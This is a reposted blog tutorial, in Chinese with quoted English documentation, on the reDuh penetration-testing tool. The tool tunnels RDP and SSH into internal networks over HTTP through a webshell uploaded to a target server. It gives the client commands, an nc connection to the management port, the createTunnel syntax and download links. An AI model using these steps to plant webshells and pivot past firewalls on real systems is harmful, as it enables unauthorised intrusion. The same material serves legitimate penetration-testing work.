关闭

reduh使用

1020人阅读 评论(0) 收藏 举报
分类:

reDuh

  • Authors: Haroon Meer, Marco Slaviero, Glenn Wilkonson (reDuhClient && JSP), Gert Burger (PHP), Ian de Villiers (ASPX)
  • Cost: Free
  • Source Code: GitHub
  • Version : 0.3
  • License : GPL
  • Release Date : 2008/07/29
  • Recent Changes : Fixed issues with PHP version and older versions of PHP

reDuh was released as part of SensePost's BlackHat USA 2008 talk on tunnelling data in and out of networks.

reDuh is actually a tool that can be used to create a TCP circuit through validly formed HTTP requests. Essentially this means that if we can upload a JSP/PHP/ASP page on a server, we can connect to hosts behind that server trivially.

Example scenario

While the original documentation made heavy use of bad ASCII art we had to have prettier pics for the .ppt so here you go:

  1. Glenn has the ability to upload/create a JSP page on the remote server.
  2. Glenn wishes to make an RDP connection to the server term-serv.victim.com (visible to the web-server behind the firewall).
  3. The firewall permits HTTP traffic to the web server but denies everything else. reDuh
  4. Glenn uploads reDuh.jsp to http://ubuntoo.victim.com/uploads/reDuh.jsp. reDuh
  5. Glenn runs reDuhClient on his machine and points it to the page: $ java reDuhClient ubuntoo.victim.com 80 /uploads/reDuh.jsp
  6. Glenn administers reDuhClient by connecting to its management port (1010 by default).
  7. Once connected, Glenn types: [createTunnel]1234:term-serv.victim.com:3389
  8. Now Glenn launches his RDP client and aims it at localhost:1234 reDuh reDuhClient and reDuh.jsp will happily shunt TCP until they are killed.

The system can handle multiple connections, so while RDP is running, we can use the management connection (on port 1010) again, and request [createTunnel]5555:sshd.victim.com:22. Glenn can now ssh to localhost on port 5555 to access the sshd on sshd.victim.com (while still running his RDP session).

  1. Behind the scenes, reDuhClient starts listening on 1234 and sends an HTTP message to /uploads/reDuh.jsp which opens a socket to term-serv.victim.com:3389.
  2. Any traffic sent to the local socket on 1234 is encoded, and wrapped in HTTP requests and is sent to /uploads/reDuh.jsp.
  3. Any traffic from term-serv.victim.com:3389 to the JSP is placed in a queue and sent back to reDuhClient when it requests it.

Disclaimer: The JSP version of reDuh is the most deployed/used/tested version. ASPX and PHP ports were done for completeness (but not extensively tested). Please let us know if you have any bug reports on any of these tools.

 

国外大牛的作品,偶顺手写了个使用说明。E文好的看原文  http://www.sensepost.com/research/reDuh/

这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。

本机-------客户端---------(http隧道)-----------服务端------------------内网服务器

服务端是个webshell(针对不同服务器有aspx,php,jsp三个版本),客户端是java写的,本机执行最好装上JDK。

把客户端文件解包,这里我把它放到E盘的TEST文件夹

011
图01

把服务端的webshell上传到目标服务器。

021
图02

目标服务器在内网,开了终端服务。

031
图03

命令行下用客户端连接服务端

E:\test>java reDuhClient 目标服务器域名 http 80 /WEBSHELL路径/reDuh.aspx

041
图04

新开一个命令行,用NC连接本机1010端口。

H:\>nc -vv localhost 1010

051
图05

连接成功会有欢迎提示,之后输入命令

>>[createTunnel]1234:127.0.0.1:3389

前面的1234是本机连接用的端口,中间的ip地址是目标服务器的(可以是webshell所在服务器也可以是和它同内网的服务器),后面的3389是欲连接目标服务器的端口。

成功后两个命令行窗口都会有成功提示。

061
图06

071
图07

这时通道已经建立,你连接本机的1234端口就相当于连接到目标服务器的3389端口了。

081
图08

091
图09

数据的传递过程

101
图10

需要注意的是用此工具转发数据速度很慢,连接的时候应尽量把mstsc的颜色设置调低些。

reDuh客户端下载 reduhclient-0.3.zip    http://www.sensepost.com/research/reDuh/reDuhClient-0.3.zip
reDuh服务端下载 reduh-server-all.gz   http://www.sensepost.com/research/reDuh/reDuh-server-all.tgz

 

0
0

猜你在找
【直播】计算机视觉原理及实战—屈教授
【套餐】深度学习入门视频课程—唐宇迪
【套餐】Hadoop生态系统零基础入门--侯勇蛟
【套餐】嵌入式Linux C编程基础--朱有鹏
【套餐】2017软考系统集成项目——任铄
【套餐】Android 5.x顶级视频课程——李宁
【直播】广义线性模型及其应用——李科
【直播】从0到1 区块链的概念到实践
【直播】机器学习之凸优化——马博士
【套餐】微信订阅号+服务号Java版 v2.0--翟东平
查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:475913次
    • 积分:5530
    • 等级:
    • 排名:第4753名
    • 原创:20篇
    • 转载:398篇
    • 译文:0篇
    • 评论:29条
    最新评论